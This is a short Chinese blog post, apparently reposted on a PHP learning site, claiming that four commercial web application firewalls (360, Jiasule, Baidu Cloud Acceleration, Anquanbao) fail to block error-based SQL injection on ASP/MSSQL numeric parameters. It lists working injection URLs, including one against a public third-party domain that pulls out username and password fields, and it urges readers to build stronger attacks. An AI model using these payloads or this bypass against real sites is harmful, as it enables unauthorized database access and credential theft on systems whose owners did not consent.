网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

百度云加速/加速乐/安全宝/360等所有waf产品某些

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 测试了下市面上 360 加速乐 百度云加速 安全宝这四个waf产品 在某种条件下均可以绕过 顺利注射出数据库信息。首先我自己搭建了环境 mssql+asp构造了一个 数字型的报错注入点。http: 19...

测试了下市面上 360/加速乐/百度云加速/安全宝
 
这四个waf产品 在某种条件下均可以绕过 顺利注射出数据库信息。
 
首先我自己搭建了环境 mssql+asp 
 
构造了一个 数字型的报错注入点。
 
 http://192.168.1.106:81/asp/num.asp?id=host_name()
http://192.168.1.106:81/asp/num.asp?id=user
http://192.168.1.106:81/asp/num.asp?id=APP_NAME()
等等 可以根据内置变量爆出很多想要的信息。
 
另外 如果能猜到字段名还可以这样。
爆出了用户名与密码。
 
在测试 做了 360网站卫士/加速乐/百度云加速/安全宝 保护的网站之后
 
对这种情况的注射都 束手无策,全部都放行。
 
 
这里仅用一例 说明
 
下面是加速乐保护的
 
http://www.cert.org.cn/num.asp?id=username%2b':'%2bpassword
 
顺利放行。
 
以上所有测试url 这些waf产品均没有拦截
 
广大基友可以根据我抛出的砖发扬一下,弄出更厉害的东西出来
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论